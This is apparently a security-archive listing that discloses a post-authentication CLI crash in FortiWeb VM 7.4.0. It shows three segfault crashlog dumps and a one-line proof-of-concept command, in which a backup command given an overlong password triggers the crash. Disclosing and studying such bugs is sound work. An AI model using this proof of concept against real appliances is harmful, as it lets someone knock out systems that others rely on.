Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- FortiWeb VM 7.4.0 build577 CLI Crash[6]
- Authored by Cody Sixteen[7]
-
FortiWeb VM version 7.4.0 build577 suffers from a post authentication CLI crash when provided a long password.
- SHA-256 |
72af24d9c4b59a9c012276d1a41593a054fdc93f5709821fab01faa7b140b6cd
- Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
;;
;; FortiWeb VM (v7.4.0 build577) Post-auth CLI Crash
;;
;; (...)
;;
;; code610 / some debug notes fyi
;;
;; 17.11.2023 @ 23:33
;;
FortiWeb # diagnose debug crashlog show
2023-11-16 05:07:00 <004315> application cli
2023-11-16 05:07:00 <004315> *** signal Segmentation fault received ***
2023-11-16 05:07:00 <004315> RIP 00007fdd1febf44f
2023-11-16 05:07:00 <004315> EFLAGS 0000000000010206
2023-11-16 05:07:00 <004315> RAX 0000000000000000
2023-11-16 05:07:00 <004315> RBX 0000000000000005
2023-11-16 05:07:00 <004315> RCX 00005642dd55d4b1
2023-11-16 05:07:00 <004315> RDX 00007ffca74d8ff0
2023-11-16 05:07:00 <004315> RSI 0000000000000000
2023-11-16 05:07:00 <004315> RDI 00007ffca74d82d0
2023-11-16 05:07:00 <004315> RBP 0000000000000000
2023-11-16 05:07:00 <004315> RSP 00007ffca74d8208
2023-11-16 05:07:00 <004315> CS 0000
2023-11-16 05:07:00 <004315> GS 0000
2023-11-16 05:07:00 <004315> FS 0033
2023-11-16 05:07:00 <004315> Trap 000000000000000e
2023-11-16 05:07:00 <004315> Error 0000000000000006
2023-11-16 05:07:00 <004315> Oldmask 0000000000000000
2023-11-16 05:07:00 <004315> CR2 00007ffca74d9020
2023-11-16 05:07:00 <004315> [0x00007fdd1febf44f] ==> /lib64/libc.so.6 + 0x000000000013d44f)
2023-11-16 05:07:00 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)
2023-11-16 05:07:00 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)
2023-11-16 05:07:38 <004315> application cli
2023-11-16 05:07:38 <004315> *** signal Segmentation fault received ***
2023-11-16 05:07:38 <004315> RIP 00007fdd1fec034f
2023-11-16 05:07:38 <004315> EFLAGS 0000000000010206
2023-11-16 05:07:38 <004315> RAX 0000000000000000
2023-11-16 05:07:38 <004315> RBX 0000000000000006
2023-11-16 05:07:38 <004315> RCX 00005642dd55403b
2023-11-16 05:07:38 <004315> RDX 00007ffca74d8fe0
2023-11-16 05:07:38 <004315> RSI 0000000000000000
2023-11-16 05:07:38 <004315> RDI 00007ffca74d82d0
2023-11-16 05:07:38 <004315> RBP 0000000000000000
2023-11-16 05:07:38 <004315> RSP 00007ffca74d8208
2023-11-16 05:07:38 <004315> CS 0000
2023-11-16 05:07:38 <004315> GS 0000
2023-11-16 05:07:38 <004315> FS 0033
2023-11-16 05:07:38 <004315> Trap 000000000000000e
2023-11-16 05:07:38 <004315> Error 0000000000000006
2023-11-16 05:07:38 <004315> Oldmask 0000000000000000
2023-11-16 05:07:38 <004315> CR2 00007ffca74d9010
2023-11-16 05:07:38 <004315> [0x00007fdd1fec034f] ==> /lib64/libc.so.6 + 0x000000000013e34f)
2023-11-16 05:07:38 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)
2023-11-16 05:07:38 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)
2023-11-16 05:08:00 <004315> application cli
2023-11-16 05:08:00 <004315> *** signal Segmentation fault received ***
2023-11-16 05:08:00 <004315> RIP 00007fdd1febf284
2023-11-16 05:08:00 <004315> EFLAGS 0000000000010246
2023-11-16 05:08:00 <004315> RAX 0000000000000000
2023-11-16 05:08:00 <004315> RBX 0000000000000006
2023-11-16 05:08:00 <004315> RCX 00005642dd558a80
2023-11-16 05:08:00 <004315> RDX 00007ffca74d9030
2023-11-16 05:08:00 <004315> RSI ffffffffffffffc0
2023-11-16 05:08:00 <004315> RDI 00007ffca74d82d0
2023-11-16 05:08:00 <004315> RBP 0000000000000000
2023-11-16 05:08:00 <004315> RSP 00007ffca74d8208
2023-11-16 05:08:00 <004315> CS 0000
2023-11-16 05:08:00 <004315> GS 0000
2023-11-16 05:08:00 <004315> FS 0033
2023-11-16 05:08:00 <004315> Trap 000000000000000e
2023-11-16 05:08:00 <004315> Error 0000000000000006
2023-11-16 05:08:00 <004315> Oldmask 0000000000000000
2023-11-16 05:08:00 <004315> CR2 00007ffca74d9000
2023-11-16 05:08:00 <004315> [0x00007fdd1febf284] ==> /lib64/libc.so.6 + 0x000000000013d284)
2023-11-16 05:08:00 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)
2023-11-16 05:08:00 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193)
FortiWeb # ;; version: FortiWeb VM (v7.4.0 build577)
;; quick poc:
fgweb_cli> execute backup cli-config tftp SOMEFILENAME 1.1.1.1 PASSWD_LEN_IS_OUR_CRASHER
;;
;; https://code610.blogspot.com/search?q=fortigate
;;
File Tags
- ActiveX[18] (932)
- Advisory[19] (83,374)
- Arbitrary[20] (16,425)
- BBS[21] (2,859)
- Bypass[22] (1,803)
- CGI[23] (1,031)
- Code Execution[24] (7,420)
- Conference[25] (683)
- Cracker[26] (843)
- CSRF[27] (3,353)
- DoS[28] (24,038)
- Encryption[29] (2,372)
- Exploit[30] (52,286)
- File Inclusion[31] (4,234)
- File Upload[32] (978)
- Firewall[33] (822)
- Info Disclosure[34] (2,809)
- Intrusion Detection[35] (900)
- Java[36] (3,091)
- JavaScript[37] (880)
- Kernel[38] (6,848)
- Local[39] (14,580)
- Magazine[40] (586)
- Overflow[41] (12,860)
- Perl[42] (1,427)
- PHP[43] (5,162)
- Proof of Concept[44] (2,349)
- Protocol[45] (3,656)
- Python[46] (1,569)
- Remote[47] (31,051)
- Root[48] (3,606)
- Rootkit[49] (515)
- Ruby[50] (614)
- Scanner[51] (1,645)
- Security Tool[52] (7,929)
- Shell[53] (3,212)
- Shellcode[54] (1,216)
- Sniffer[55] (897)
- Spoof[56] (2,229)
- SQL Injection[57] (16,442)
- TCP[58] (2,419)
- Trojan[59] (687)
- UDP[60] (896)
- Virus[61] (667)
- Vulnerability[62] (32,103)
- Web[63] (9,789)
- Whitepaper[64] (3,759)
- x86[65] (966)
- XSS[66] (18,055)
- Other[67]
File Archives
- December 2023[68]
- November 2023[69]
- October 2023[70]
- September 2023[71]
- August 2023[72]
- July 2023[73]
- June 2023[74]
- May 2023[75]
- April 2023[76]
- March 2023[77]
- February 2023[78]
- January 2023[79]
- Older[80]
Systems
- AIX[81] (429)
- Apple[82] (2,037)
- BSD[83] (375)
- CentOS[84] (57)
- Cisco[85] (1,926)
- Debian[86] (6,914)
- Fedora[87] (1,692)
- FreeBSD[88] (1,246)
- Gentoo[89] (4,379)
- HPUX[90] (880)
- iOS[91] (363)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (69)
- Linux[95] (47,850)
- Mac OS X[96] (691)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (486)
- RedHat[100] (14,624)
- Slackware[101] (941)
- Solaris[102] (1,611)
- SUSE[103] (1,444)
- Ubuntu[104] (9,137)
- UNIX[105] (9,340)
- UnixWare[106] (187)
- Windows[107] (6,606)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]